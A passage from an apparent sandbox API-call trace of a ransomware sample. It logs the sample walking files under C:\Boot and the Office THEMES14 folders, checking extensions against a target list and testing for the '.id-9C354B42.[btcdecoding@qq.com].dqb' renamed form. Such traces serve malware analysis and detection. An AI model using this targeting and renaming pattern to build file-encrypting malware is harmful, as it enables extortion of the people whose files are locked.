0x634c58 [0268.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x4050020 [0268.876] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x635018 [0268.876] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x635018, Size=0x20) returned 0x65b800 [0268.876] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x635018 [0268.876] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x635018, Size=0x20) returned 0x65b828 [0268.876] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.876] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.876] Wow64DisableWow64FsRedirection (in: OldValue=0x360ff58 | out: OldValue=0x360ff58*=0x0) returned 1 [0268.876] lstrlenW (lpString="kernel32.dll") returned 12 [0268.876] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b800 | out: hHeap=0x5e0000) returned 1 [0268.876] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.876] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b828 | out: hHeap=0x5e0000) returned 1 [0268.876] Sleep (dwMilliseconds=0x64) [0269.213] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0269.213] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0269.213] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.278] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=89168) returned 1 [0269.278] CloseHandle (hObject=0x1f0) returned 1 [0269.278] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0269.278] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.279] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.279] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.279] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.279] lstrlenW (lpString=".doc") returned 4 [0269.279] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.279] lstrlenW (lpString=".docx") returned 5 [0269.279] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.279] lstrlenW (lpString=".pdf") returned 4 [0269.279] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.279] lstrlenW (lpString=".xls") returned 4 [0269.279] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.279] lstrlenW (lpString=".xlsx") returned 5 [0269.279] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.279] lstrlenW (lpString=".ppt") returned 4 [0269.279] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.279] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.279] lstrlenW (lpString=".zip") returned 4 [0269.279] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.279] lstrlenW (lpString=".rar") returned 4 [0269.279] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.279] lstrlenW (lpString=".bz2") returned 4 [0269.279] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.279] lstrlenW (lpString=".7z") returned 3 [0269.279] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.279] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.279] lstrlenW (lpString=".dbf") returned 4 [0269.279] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.279] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.279] lstrlenW (lpString=".1cd") returned 4 [0269.279] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.280] lstrlenW (lpString=".jpg") returned 4 [0269.280] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.280] lstrlenW (lpString=".doc") returned 4 [0269.280] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0269.280] lstrlenW (lpString=".docx") returned 5 [0269.280] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0269.280] lstrlenW (lpString=".pdf") returned 4 [0269.280] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0269.280] lstrlenW (lpString=".xls") returned 4 [0269.280] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0269.280] lstrlenW (lpString=".xlsx") returned 5 [0269.280] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0269.280] lstrlenW (lpString=".ppt") returned 4 [0269.280] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.280] lstrlenW (lpString=".zip") returned 4 [0269.280] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0269.280] lstrlenW (lpString=".rar") returned 4 [0269.280] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0269.280] lstrlenW (lpString=".bz2") returned 4 [0269.280] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0269.280] lstrlenW (lpString=".7z") returned 3 [0269.280] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.280] lstrlenW (lpString=".dbf") returned 4 [0269.280] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.280] lstrlenW (lpString=".1cd") returned 4 [0269.280] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0269.280] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0269.281] lstrlenW (lpString=".jpg") returned 4 [0269.281] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0269.281] lstrcmpiW (lpString1=".ttf", lpString2=".dqb") returned 1 [0269.281] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0269.281] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0269.299] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=47452) returned 1 [0269.299] CloseHandle (hObject=0x1f0) returned 1 [0269.299] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0269.367] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.367] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.367] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.367] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.367] lstrlenW (lpString=".doc") returned 4 [0269.367] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0269.367] lstrlenW (lpString=".docx") returned 5 [0269.367] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0269.367] lstrlenW (lpString=".pdf") returned 4 [0269.367] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0269.367] lstrlenW (lpString=".xls") returned 4 [0269.368] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0269.368] lstrlenW (lpString=".xlsx") returned 5 [0269.368] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0269.368] lstrlenW (lpString=".ppt") returned 4 [0269.368] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.368] lstrlenW (lpString=".zip") returned 4 [0269.368] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0269.368] lstrlenW (lpString=".rar") returned 4 [0269.368] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString=".bz2") returned 4 [0269.368] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString=".7z") returned 3 [0269.368] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0269.368] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.368] lstrlenW (lpString=".dbf") returned 4 [0269.368] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.368] lstrlenW (lpString=".1cd") returned 4 [0269.368] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.368] lstrlenW (lpString=".jpg") returned 4 [0269.368] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.368] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.368] lstrlenW (lpString=".doc") returned 4 [0269.368] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0269.368] lstrlenW (lpString=".docx") returned 5 [0269.368] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0269.368] lstrlenW (lpString=".pdf") returned 4 [0269.368] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0269.369] lstrlenW (lpString=".xls") returned 4 [0269.369] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0269.369] lstrlenW (lpString=".xlsx") returned 5 [0269.369] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0269.369] lstrlenW (lpString=".ppt") returned 4 [0269.369] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0269.369] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.369] lstrlenW (lpString=".zip") returned 4 [0269.369] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0269.369] lstrlenW (lpString=".rar") returned 4 [0269.369] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0269.369] lstrlenW (lpString=".bz2") returned 4 [0269.369] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0269.369] lstrlenW (lpString=".7z") returned 3 [0269.369] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0269.369] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.369] lstrlenW (lpString=".dbf") returned 4 [0269.369] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0269.369] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.369] lstrlenW (lpString=".1cd") returned 4 [0269.369] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0269.369] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0269.369] lstrlenW (lpString=".jpg") returned 4 [0269.369] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0269.369] Sleep (dwMilliseconds=0x64) [0269.754] Sleep (dwMilliseconds=0x64) [0270.133] lstrcmpiW (lpString1=".ELM", lpString2=".dqb") returned 1 [0270.133] lstrlenW (lpString="CONCRETE.ELM") returned 12 [0270.133] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.255] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=45528) returned 1 [0270.255] CloseHandle (hObject=0x1f4) returned 1 [0270.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm")) returned 0x20 [0270.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.255] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\concrete.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.255] lstrlenW (lpString=".doc") returned 4 [0270.255] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.255] lstrlenW (lpString=".docx") returned 5 [0270.255] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0270.255] lstrlenW (lpString=".pdf") returned 4 [0270.255] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.255] lstrlenW (lpString=".xls") returned 4 [0270.255] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.255] lstrlenW (lpString=".xlsx") returned 5 [0270.256] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0270.256] lstrlenW (lpString=".ppt") returned 4 [0270.256] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.256] lstrlenW (lpString=".zip") returned 4 [0270.256] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.256] lstrlenW (lpString=".rar") returned 4 [0270.256] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.256] lstrlenW (lpString=".bz2") returned 4 [0270.256] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.256] lstrlenW (lpString=".7z") returned 3 [0270.256] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.256] lstrlenW (lpString=".dbf") returned 4 [0270.256] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.256] lstrlenW (lpString=".1cd") returned 4 [0270.256] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.256] lstrlenW (lpString=".jpg") returned 4 [0270.256] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.256] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.256] lstrlenW (lpString=".doc") returned 4 [0270.256] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.256] lstrlenW (lpString=".docx") returned 5 [0270.256] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0270.256] lstrlenW (lpString=".pdf") returned 4 [0270.256] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.256] lstrlenW (lpString=".xls") returned 4 [0270.256] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.256] lstrlenW (lpString=".xlsx") returned 5 [0270.256] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0270.257] lstrlenW (lpString=".ppt") returned 4 [0270.257] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.257] lstrlenW (lpString=".zip") returned 4 [0270.257] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.257] lstrlenW (lpString=".rar") returned 4 [0270.257] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.257] lstrlenW (lpString=".bz2") returned 4 [0270.257] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.257] lstrlenW (lpString=".7z") returned 3 [0270.257] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.257] lstrlenW (lpString=".dbf") returned 4 [0270.257] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.257] lstrlenW (lpString=".1cd") returned 4 [0270.257] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\CONCRETE.ELM") returned 77 [0270.257] lstrlenW (lpString=".jpg") returned 4 [0270.257] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.257] lstrcmpiW (lpString1=".ELM", lpString2=".dqb") returned 1 [0270.257] lstrlenW (lpString="DEEPBLUE.ELM") returned 12 [0270.257] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.259] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=71388) returned 1 [0270.259] CloseHandle (hObject=0x1f4) returned 1 [0270.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm")) returned 0x20 [0270.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.259] lstrlenW (lpString=".doc") returned 4 [0270.259] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.259] lstrlenW (lpString=".docx") returned 5 [0270.259] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0270.259] lstrlenW (lpString=".pdf") returned 4 [0270.259] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.259] lstrlenW (lpString=".xls") returned 4 [0270.259] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.259] lstrlenW (lpString=".xlsx") returned 5 [0270.259] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0270.259] lstrlenW (lpString=".ppt") returned 4 [0270.259] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.259] lstrlenW (lpString=".zip") returned 4 [0270.259] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.259] lstrlenW (lpString=".rar") returned 4 [0270.259] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.259] lstrlenW (lpString=".bz2") returned 4 [0270.259] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.260] lstrlenW (lpString=".7z") returned 3 [0270.260] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.260] lstrlenW (lpString=".dbf") returned 4 [0270.260] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.260] lstrlenW (lpString=".1cd") returned 4 [0270.260] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.260] lstrlenW (lpString=".jpg") returned 4 [0270.260] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.260] lstrlenW (lpString=".doc") returned 4 [0270.260] lstrcmpiW (lpString1=".doc", lpString2=".ELM") returned -1 [0270.260] lstrlenW (lpString=".docx") returned 5 [0270.260] lstrcmpiW (lpString1=".docx", lpString2="E.ELM") returned -1 [0270.260] lstrlenW (lpString=".pdf") returned 4 [0270.260] lstrcmpiW (lpString1=".pdf", lpString2=".ELM") returned 1 [0270.260] lstrlenW (lpString=".xls") returned 4 [0270.260] lstrcmpiW (lpString1=".xls", lpString2=".ELM") returned 1 [0270.260] lstrlenW (lpString=".xlsx") returned 5 [0270.260] lstrcmpiW (lpString1=".xlsx", lpString2="E.ELM") returned -1 [0270.260] lstrlenW (lpString=".ppt") returned 4 [0270.260] lstrcmpiW (lpString1=".ppt", lpString2=".ELM") returned 1 [0270.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.260] lstrlenW (lpString=".zip") returned 4 [0270.260] lstrcmpiW (lpString1=".zip", lpString2=".ELM") returned 1 [0270.260] lstrlenW (lpString=".rar") returned 4 [0270.260] lstrcmpiW (lpString1=".rar", lpString2=".ELM") returned 1 [0270.260] lstrlenW (lpString=".bz2") returned 4 [0270.260] lstrcmpiW (lpString1=".bz2", lpString2=".ELM") returned -1 [0270.261] lstrlenW (lpString=".7z") returned 3 [0270.261] lstrcmpiW (lpString1=".7z", lpString2="ELM") returned -1 [0270.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.261] lstrlenW (lpString=".dbf") returned 4 [0270.261] lstrcmpiW (lpString1=".dbf", lpString2=".ELM") returned -1 [0270.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.261] lstrlenW (lpString=".1cd") returned 4 [0270.261] lstrcmpiW (lpString1=".1cd", lpString2=".ELM") returned -1 [0270.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 77 [0270.261] lstrlenW (lpString=".jpg") returned 4 [0270.261] lstrcmpiW (lpString1=".jpg", lpString2=".ELM") returned 1 [0270.261] lstrcmpiW (lpString1=".INF", lpString2=".dqb") returned 1 [0270.261] lstrlenW (lpString="DEEPBLUE.INF") returned 12 [0270.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0270.261] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x360ff1c | out: lpFileSize=0x360ff1c*=569) returned 1 [0270.261] CloseHandle (hObject=0x1f4) returned 1 [0270.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf")) returned 0x20 [0270.261] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.261] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 77 [0270.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 